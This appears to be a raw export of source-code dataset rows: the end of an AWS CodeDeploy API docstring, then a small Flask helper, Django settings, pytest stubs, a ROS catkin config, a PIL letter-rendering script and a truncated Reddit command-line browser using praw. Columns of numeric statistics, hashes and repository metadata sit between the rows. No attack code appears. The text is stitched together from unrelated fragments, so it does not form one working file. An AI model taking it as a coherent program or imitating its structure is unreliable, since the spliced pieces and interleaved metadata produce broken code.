:type applicationName: string
:param applicationName: [REQUIRED]
The application name corresponding to the deployment group to update.
:type currentDeploymentGroupName: string
:param currentDeploymentGroupName: [REQUIRED]
The current name of the deployment group.
:type newDeploymentGroupName: string
:param newDeploymentGroupName: The new name of the deployment group, if you want to change it.
:type deploymentConfigName: string
:param deploymentConfigName: The replacement deployment configuration name to use, if you want to change it.
:type ec2TagFilters: list
:param ec2TagFilters: The replacement set of Amazon EC2 tags on which to filter, if you want to change them. To keep the existing tags, enter their names. To remove tags, do not enter any tag names.
(dict) --Information about an EC2 tag filter.
Key (string) --The tag filter key.
Value (string) --The tag filter value.
Type (string) --The tag filter type:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
:type onPremisesInstanceTagFilters: list
:param onPremisesInstanceTagFilters: The replacement set of on-premises instance tags on which to filter, if you want to change them. To keep the existing tags, enter their names. To remove tags, do not enter any tag names.
(dict) --Information about an on-premises instance tag filter.
Key (string) --The on-premises instance tag filter key.
Value (string) --The on-premises instance tag filter value.
Type (string) --The on-premises instance tag filter type:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
:type autoScalingGroups: list
:param autoScalingGroups: The replacement list of Auto Scaling groups to be included in the deployment group, if you want to change them. To keep the Auto Scaling groups, enter their names. To remove Auto Scaling groups, do not enter any Auto Scaling group names.
(string) --
:type serviceRoleArn: string
:param serviceRoleArn: A replacement ARN for the service role, if you want to change it.
:type triggerConfigurations: list
:param triggerConfigurations: Information about triggers to change when the deployment group is updated. For examples, see Modify Triggers in an AWS CodeDeploy Deployment Group in the AWS CodeDeploy User Guide.
(dict) --Information about notification triggers for the deployment group.
triggerName (string) --The name of the notification trigger.
triggerTargetArn (string) --The ARN of the Amazon Simple Notification Service topic through which notifications about deployment or instance events are sent.
triggerEvents (list) --The event type or types for which notifications are triggered.
(string) --
:type alarmConfiguration: dict
:param alarmConfiguration: Information to add or change about Amazon CloudWatch alarms when the deployment group is updated.
enabled (boolean) --Indicates whether the alarm configuration is enabled.
ignorePollAlarmFailure (boolean) --Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from Amazon CloudWatch. The default value is false.
true: The deployment will proceed even if alarm status information can't be retrieved from Amazon CloudWatch.
false: The deployment will stop if alarm status information can't be retrieved from Amazon CloudWatch.
alarms (list) --A list of alarms configured for the deployment group. A maximum of 10 alarms can be added to a deployment group.
(dict) --Information about an alarm.
name (string) --The name of the alarm. Maximum length is 255 characters. Each alarm name can be used only once in a list of alarms.
:type autoRollbackConfiguration: dict
:param autoRollbackConfiguration: Information for an automatic rollback configuration that is added or changed when a deployment group is updated.
enabled (boolean) --Indicates whether a defined automatic rollback configuration is currently enabled.
events (list) --The event type or types that trigger a rollback.
(string) --
:type deploymentStyle: dict
:param deploymentStyle: Information about the type of deployment, either in-place or blue/green, you want to run and whether to route deployment traffic behind a load balancer.
deploymentType (string) --Indicates whether to run an in-place deployment or a blue/green deployment.
deploymentOption (string) --Indicates whether to route deployment traffic behind a load balancer.
:type blueGreenDeploymentConfiguration: dict
:param blueGreenDeploymentConfiguration: Information about blue/green deployment options for a deployment group.
terminateBlueInstancesOnDeploymentSuccess (dict) --Information about whether to terminate instances in the original fleet during a blue/green deployment.
action (string) --The action to take on instances in the original environment after a successful blue/green deployment.
TERMINATE: Instances are terminated after a specified wait time.
KEEP_ALIVE: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
terminationWaitTimeInMinutes (integer) --The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
deploymentReadyOption (dict) --Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment.
actionOnTimeout (string) --Information about when to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
CONTINUE_DEPLOYMENT: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
STOP_DEPLOYMENT: Do not register new instances with load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
waitTimeInMinutes (integer) --The number of minutes to wait before the status of a blue/green deployment changed to Stopped if rerouting is not started manually. Applies only to the STOP_DEPLOYMENT option for actionOnTimeout
greenFleetProvisioningOption (dict) --Information about how instances are provisioned for a replacement environment in a blue/green deployment.
action (string) --The method used to add instances to a replacement environment.
DISCOVER_EXISTING: Use instances that already exist or will be created manually.
COPY_AUTO_SCALING_GROUP: Use settings from a specified Auto Scaling group to define and create instances in a new Auto Scaling group.
:type loadBalancerInfo: dict
:param loadBalancerInfo: Information about the load balancer used in a deployment.
elbInfoList (list) --An array containing information about the load balancer in Elastic Load Balancing to use in a deployment.
(dict) --Information about a load balancer in Elastic Load Balancing to use in a deployment.
name (string) --For blue/green deployments, the name of the load balancer that will be used to route traffic from original instances to replacement instances in a blue/green deployment. For in-place deployments, the name of the load balancer that instances are deregistered from so they are not serving traffic during a deployment, and then re-registered with after the deployment completes.
:rtype: dict
:return: {
'hooksNotCleanedUp': [
{
'name': 'string',
'hook': 'string'
},
]
}
"""
pass
| 39.556189
| 669
| 0.593392
| 9,304
| 97,150
| 6.143809
| 0.076419
| 0.007173
| 0.00677
| 0.008642
| 0.779486
| 0.744288
| 0.719586
| 0.69373
| 0.679665
| 0.663973
| 0
| 0.00632
| 0.328976
| 97,150
| 2,455
| 670
| 39.572301
| 0.870532
| 0.863695
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
c316843677383f785526b2dfcc8be68396c6ac4d
| 142
|
py
|
Python
|
api/app/utils/misc.py
|
martinoywa/Baobab
|
f87bfefa69398fb8a59fc7684323c89f2813c1a0
|
[
"Apache-2.0"
] | 1
|
2020-03-08T20:00:24.000Z
|
2020-03-08T20:00:24.000Z
|
api/app/utils/misc.py
|
martinoywa/Baobab
|
f87bfefa69398fb8a59fc7684323c89f2813c1a0
|
[
"Apache-2.0"
] | null | null | null |
api/app/utils/misc.py
|
martinoywa/Baobab
|
f87bfefa69398fb8a59fc7684323c89f2813c1a0
|
[
"Apache-2.0"
] | null | null | null |
import uuid
from flask import g
def get_baobab_host():
return g.organisation.system_url
def make_code():
return str(uuid.uuid4())
| 12.909091
| 36
| 0.725352
| 22
| 142
| 4.5
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008621
| 0.183099
| 142
| 10
| 37
| 14.2
| 0.844828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
c33f00ed8ebffd04a69b84d715322c1c7e7d9b68
| 37
|
py
|
Python
|
modules/geopy/parsers/__init__.py
|
flavour/lacity
|
fd1f1cccdcea64d07143b29d4f88996e3af35c4b
|
[
"MIT"
] | 3
|
2015-05-18T05:44:34.000Z
|
2018-05-11T12:15:44.000Z
|
geopy/parsers/__init__.py
|
datadesk/latimes-mappingla-geopy
|
1afcfd98292b929363007e7cd38beae55cdec12d
|
[
"MIT"
] | null | null | null |
geopy/parsers/__init__.py
|
datadesk/latimes-mappingla-geopy
|
1afcfd98292b929363007e7cd38beae55cdec12d
|
[
"MIT"
] | 1
|
2020-04-29T13:58:31.000Z
|
2020-04-29T13:58:31.000Z
|
from geopy.parsers.base import Parser
| 37
| 37
| 0.864865
| 6
| 37
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 37
| 1
| 37
| 37
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c352020e5b04cb87f25c913e31b0709fc453c8fc
| 336
|
py
|
Python
|
app/app/settings/prod.py
|
AbhiAgarwal/django-template
|
0f328c4fb43949751ad8a331b376164a86433d1c
|
[
"MIT"
] | null | null | null |
app/app/settings/prod.py
|
AbhiAgarwal/django-template
|
0f328c4fb43949751ad8a331b376164a86433d1c
|
[
"MIT"
] | null | null | null |
app/app/settings/prod.py
|
AbhiAgarwal/django-template
|
0f328c4fb43949751ad8a331b376164a86433d1c
|
[
"MIT"
] | null | null | null |
"""
Django settings for glean project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
from app.settings.common import *
| 33.6
| 60
| 0.770833
| 55
| 336
| 4.709091
| 0.672727
| 0.023166
| 0.092664
| 0.19305
| 0.247104
| 0.247104
| 0.247104
| 0.247104
| 0
| 0
| 0
| 0.023411
| 0.110119
| 336
| 9
| 61
| 37.333333
| 0.842809
| 0.872024
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
6f374df30a0c096e4a7c8f72e22cf06648392875
| 271
|
py
|
Python
|
faketests/animals/test_successful_tests.py
|
Djailla/pytest-sugar
|
6ac4a1fa18a51e67c7a759bc11a9264cb78619e4
|
[
"BSD-3-Clause"
] | 418
|
2019-08-30T00:41:51.000Z
|
2022-03-21T09:31:54.000Z
|
faketests/animals/test_successful_tests.py
|
Djailla/pytest-sugar
|
6ac4a1fa18a51e67c7a759bc11a9264cb78619e4
|
[
"BSD-3-Clause"
] | 62
|
2019-08-27T16:50:36.000Z
|
2022-03-11T07:03:32.000Z
|
faketests/animals/test_successful_tests.py
|
Djailla/pytest-sugar
|
6ac4a1fa18a51e67c7a759bc11a9264cb78619e4
|
[
"BSD-3-Clause"
] | 25
|
2019-11-27T15:58:16.000Z
|
2022-03-21T09:31:56.000Z
|
def test_cat1():
assert True
def test_cat2():
assert True
def test_cat3():
assert True
def test_cat4():
assert True
def test_cat5():
assert True
def test_cat6():
assert True
def test_cat7():
assert True
def test_cat8():
assert True
| 11.291667
| 16
| 0.649446
| 40
| 271
| 4.2
| 0.3
| 0.333333
| 0.541667
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 0.261993
| 271
| 23
| 17
| 11.782609
| 0.8
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6f79ffaa1085428bf5196f6faa49b6f5bb62f9b1
| 812
|
py
|
Python
|
RasPi_Dev/ros_ws/build/third_packages/ar_track_alvar/ar_track_alvar/catkin_generated/pkg.develspace.context.pc.py
|
QianheYu/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T03:31:15.000Z
|
2022-03-11T03:31:15.000Z
|
RasPi_Dev/ros_ws/build/third_packages/ar_track_alvar/ar_track_alvar/catkin_generated/pkg.develspace.context.pc.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
RasPi_Dev/ros_ws/build/third_packages/ar_track_alvar/ar_track_alvar/catkin_generated/pkg.develspace.context.pc.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/xtark/ros_ws/devel/include;/home/xtark/ros_ws/src/third_packages/ar_track_alvar/ar_track_alvar/include".split(';') if "/home/xtark/ros_ws/devel/include;/home/xtark/ros_ws/src/third_packages/ar_track_alvar/ar_track_alvar/include" != "" else []
PROJECT_CATKIN_DEPENDS = "ar_track_alvar_msgs;std_msgs;roscpp;tf;tf2;message_runtime;image_transport;sensor_msgs;geometry_msgs;visualization_msgs;resource_retriever;cv_bridge;pcl_ros;pcl_conversions;dynamic_reconfigure".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lar_track_alvar".split(';') if "-lar_track_alvar" != "" else []
PROJECT_NAME = "ar_track_alvar"
PROJECT_SPACE_DIR = "/home/xtark/ros_ws/devel"
PROJECT_VERSION = "0.7.1"
| 90.222222
| 283
| 0.810345
| 125
| 812
| 4.856
| 0.488
| 0.131796
| 0.118616
| 0.115321
| 0.317957
| 0.286656
| 0.286656
| 0.286656
| 0.286656
| 0.286656
| 0
| 0.005175
| 0.04803
| 812
| 8
| 284
| 101.5
| 0.780078
| 0.066502
| 0
| 0
| 1
| 0.428571
| 0.64418
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
488ca710dbf71dd34c6f345c3455c22c3efcb671
| 571
|
py
|
Python
|
create_img.py
|
oghahroodi/Hopfield-Network
|
da2d5f28358e5615ce3244a4c6dd1e14be5d8749
|
[
"MIT"
] | null | null | null |
create_img.py
|
oghahroodi/Hopfield-Network
|
da2d5f28358e5615ce3244a4c6dd1e14be5d8749
|
[
"MIT"
] | null | null | null |
create_img.py
|
oghahroodi/Hopfield-Network
|
da2d5f28358e5615ce3244a4c6dd1e14be5d8749
|
[
"MIT"
] | null | null | null |
from PIL import Image, ImageFont
font_siza = 16
font = ImageFont.truetype("Tahoma.ttf", font_siza)
for char in "ABCDEFGHIJ":
im = Image.Image()._new(font.getmask(char))
im.save("train/16/"+char+".bmp")
font_siza = 32
font = ImageFont.truetype("Tahoma.ttf", font_siza)
for char in "ABCDEFGHIJ":
im = Image.Image()._new(font.getmask(char))
im.save("train/32/"+char+".bmp")
font_siza = 64
font = ImageFont.truetype("Tahoma.ttf", font_siza)
for char in "ABCDEFGHIJ":
im = Image.Image()._new(font.getmask(char))
im.save("train/64/"+char+".bmp")
| 23.791667
| 50
| 0.677758
| 86
| 571
| 4.395349
| 0.267442
| 0.126984
| 0.166667
| 0.214286
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0
| 0.02449
| 0.141856
| 571
| 23
| 51
| 24.826087
| 0.746939
| 0
| 0
| 0.5625
| 0
| 0
| 0.17338
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
489660e980cda67beaaf63886bab7c83e22c9fc1
| 17,628
|
py
|
Python
|
reddit/rdt.py
|
yathartha1/RedditCLI
|
21ef0005b4dfcbbba6678b4d405fa37242ac43ea
|
[
"MIT"
] | null | null | null |
reddit/rdt.py
|
yathartha1/RedditCLI
|
21ef0005b4dfcbbba6678b4d405fa37242ac43ea
|
[
"MIT"
] | null | null | null |
reddit/rdt.py
|
yathartha1/RedditCLI
|
21ef0005b4dfcbbba6678b4d405fa37242ac43ea
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import webbrowser
from .config import config
import praw
import pickle
from textwrap import fill
cfg = config()
client_id = cfg.get_clientid()
user_agent = cfg.get_useragent()
reddit = praw.Reddit(client_id = client_id,
client_secret = None,
user_agent = user_agent)
class rdt:
def ls(move, subreddits, sort):
def handleListCallType(type):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
dictvals['nextpreviousnormal'] = "False"
dictvals['nextprevioussubreddits'] = "False"
del dictvals['links'][:]
del dictvals['listofsubmissions'][:]
del dictvals['listofsubreddits'][:]
temp = 0
if type == 'hot':
submissions = reddit.front.hot(limit = 100)
elif type == 'new':
submissions = reddit.front.new(limit = 100)
elif type == 'controversial':
submissions = reddit.front.controversial(limit = 100)
elif type == 'top':
submissions = reddit.front.top(limit = 100)
elif type == 'rising':
submissions = reddit.front.rising(limit = 100)
for listvals in submissions:
dictvals['listofsubmissions'].append(listvals)
for i in range(0,len(dictvals['listofsubmissions'])):
if temp<10:
temp = temp + 1
wrapped = fill(dictvals['listofsubmissions'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubmissions'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes with {2} Comments \33[0m".format('', str(dictvals['listofsubmissions'][i].ups), str(dictvals['listofsubmissions'][i].num_comments)))
dictvals['links'].append(dictvals['listofsubmissions'][i].url)
dictvals['listed'] = "True"
dictvals['countlist'] = temp
if len(dictvals['listofsubmissions']) >= 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
dictvals['nextpreviousnormal'] = "True"
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals, f)
f.close()
def handleMoreList(move):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
if move == 'next':
temp = 0
if dictvals['listed'] == "True" and dictvals['countlist']<len(dictvals['listofsubmissions']):
for i in range(dictvals['countlist'],len(dictvals['listofsubmissions'])):
if temp < 10:
temp = temp + 1
wrapped = fill(dictvals['listofsubmissions'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubmissions'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes with {2} Comments \33[0m".format('', str(dictvals['listofsubmissions'][i].ups), str(dictvals['listofsubmissions'][i].num_comments)))
dictvals['links'].append(dictvals['listofsubmissions'][i].url)
dictvals['countlist'] = dictvals['countlist'] + temp
dictvals['tempvar'] = temp
if dictvals['countlist'] != len(dictvals['listofsubmissions']):
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next | previous'))
else:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('previous'))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
elif move == 'previous':
if dictvals['listed'] == "True" and dictvals['countlist']>10:
dictvals['countlist'] = dictvals['countlist'] - dictvals['tempvar']
for i in range(dictvals['countlist']-10,dictvals['countlist']):
wrapped = fill(dictvals['listofsubmissions'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubmissions'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', dictvals['listofsubmissions'][i].url))
print("{0:<5} \33[90m {1} Upvotes with {2} Comments \33[0m".format('', str(dictvals['listofsubmissions'][i].ups), str(dictvals['listofsubmissions'][i].num_comments)))
dictvals['links'].append(dictvals['listofsubmissions'][i].url)
dictvals['tempvar'] = 10
if dictvals['countlist'] > 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next | previous'))
else:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
def handleMoreSubreddits(move):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
if move == 'next':
temp = 0
if dictvals['listed'] == "True" and dictvals['countlist']<len(dictvals['listofsubreddits']):
for i in range(dictvals['countlist'],len(dictvals['listofsubreddits'])):
if temp < 10:
temp = temp + 1
wrapped = fill(dictvals['listofsubreddits'][i].display_name_prefixed+ " - "+dictvals['listofsubreddits'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubreddits'][i].urll, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} subscribers\33[0m".format('', str(dictvals['listofsubreddits'][i].subscribers)))
dictvals['countlist'] = dictvals['countlist'] + temp
dictvals['tempvar'] = temp
if dictvals['countlist'] != len(dictvals['listofsubreddits']):
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next | previous'))
else:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('previous'))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
elif move == 'previous':
if dictvals['listed'] == "True" and dictvals['countlist']>10:
dictvals['countlist'] = dictvals['countlist'] - dictvals['tempvar']
for i in range(dictvals['countlist']-10,dictvals['countlist']):
wrapped = fill(dictvals['listofsubreddits'][i].display_name_prefixed+ " - "+dictvals['listofsubreddits'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubreddits'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', dictvals['listofsubreddits'][i].url))
print("{0:<5} \33[90m {1} subscribers\33[0m".format('', str(dictvals['listofsubreddits'][i].subscribers)))
dictvals['tempvar'] = 10
if dictvals['countlist'] > 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next | previous'))
else:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
if move == sort == None and subreddits == False:
handleListCallType('hot')
elif move == None and subreddits == False and sort != None:
handleListCallType(sort)
elif (move == 'next' or move == 'previous') and subreddits == False and sort == None:
if dictvals['nextpreviousnormal'] == "True":
handleMoreList(move)
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Nothing to Display'))
elif move == None and subreddits == True and sort == None:
dictvals['nextpreviousnormal'] = False
dictvals['nextprevioussubreddits'] = False
temp = 0
del dictvals['links'][:]
del dictvals['listofsubmissions'][:]
del dictvals['listofsubreddits'][:]
subreddits = reddit.subreddits.popular(limit = 100)
for listvals in subreddits:
dictvals['listofsubreddits'].append(listvals)
for i in range(0,len(dictvals['listofsubreddits'])):
if temp<10:
temp = temp + 1
wrapped = fill(dictvals['listofsubreddits'][i].display_name_prefixed+ " - "+dictvals['listofsubreddits'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubreddits'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', dictvals['listofsubreddits'][i].url))
print("{0:<5} \33[90m {1} subscribers\33[0m".format('', str(dictvals['listofsubreddits'][i].subscribers)))
dictvals['listed'] = "True"
dictvals['countlist'] = temp
if len(dictvals['listofsubreddits']) >= 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
dictvals['nextprevioussubreddits'] = "True"
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
elif (move == 'next' or move == 'previous') and subreddits == True and sort == None:
if dictvals['nextprevioussubreddits'] == "True":
handleMoreSubreddits(move)
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Nothing to Display'))
def view(index, comments, more_comments):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
def handleMoreComments():
temp = 0
if dictvals['countcomments'] < len(dictvals['listofcomments']):
for i in range(dictvals['countcomments'],len(dictvals['listofcomments'])):
if (temp<10):
temp = temp + 1
wrapped = fill(dictvals['listofcomments'][i].body, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(str(dictvals['listofcomments'][i].author), width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m Posted By {1}\33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes\33[0m".format('', str(dictvals['listofcomments'][i].ups)))
dictvals['countcomments'] = dictvals['countcomments'] + temp
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
if dictvals['listed'] == "True" and len(dictvals['links']) != 0:
if index != None and comments == more_comments == False:
if int(index)<len(dictvals['links']) and int(index)>=0:
webbrowser.open(dictvals['links'][int(index)])
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No Such Index'))
elif index != None and comments == True and more_comments == False:
if int(index)<len(dictvals['listofsubmissions']) and int(index)>=0:
del dictvals['listofcomments'][:]
comments = dictvals['listofsubmissions'][int(index)].comments
for comment in comments:
dictvals['listofcomments'].append(comment)
if len(dictvals['listofcomments'])>=10:
for i in range(0,10):
wrapped = fill(dictvals['listofcomments'][i].body, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(str(dictvals['listofcomments'][i].author), width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m Posted By {1}\33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes\33[0m".format('', str(dictvals['listofcomments'][i].ups)))
dictvals['countcomments'] = 10
else:
for i in range(0,len(dictvals['listofcomments'])):
wrapped = fill(dictvals['listofcomments'][i].body, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(str(dictvals['listofcomments'][i].author), width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m Posted By {1}\33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes\33[0m".format('', str(dictvals['listofcomments'][i].ups)))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No Such Index'))
elif index != None and comments == False and more_comments == True:
if len(dictvals['listofcomments']) != 0 and dictvals['countcomments'] == 10:
handleMoreComments()
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Nothing to View'))
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Nothing to View'))
def search(input):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
if input != None:
dictvals['nextpreviousnormal'] = "False"
dictvals['nextprevioussubreddits'] = "False"
temp = 0
del dictvals['links'][:]
del dictvals['listofsubmissions'][:]
del dictvals['listofsubreddits'][:]
try:
searchs = reddit.subreddit('all').search(str(input),limit = 100)
for listvals in searchs:
dictvals['listofsubmissions'].append(listvals)
except:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Invalid Entry'))
else:
for i in range(0,len(dictvals['listofsubmissions'])):
if temp<10:
temp = temp + 1
wrapped = fill(dictvals['listofsubmissions'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubmissions'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes with {2} Comments \33[0m".format('', str(dictvals['listofsubmissions'][i].ups), str(dictvals['listofsubmissions'][i].num_comments)))
dictvals['links'].append(dictvals['listofsubmissions'][i].url)
dictvals['listed'] = "True"
dictvals['countlist'] = temp
if len(dictvals['listofsubmissions']) >= 10:
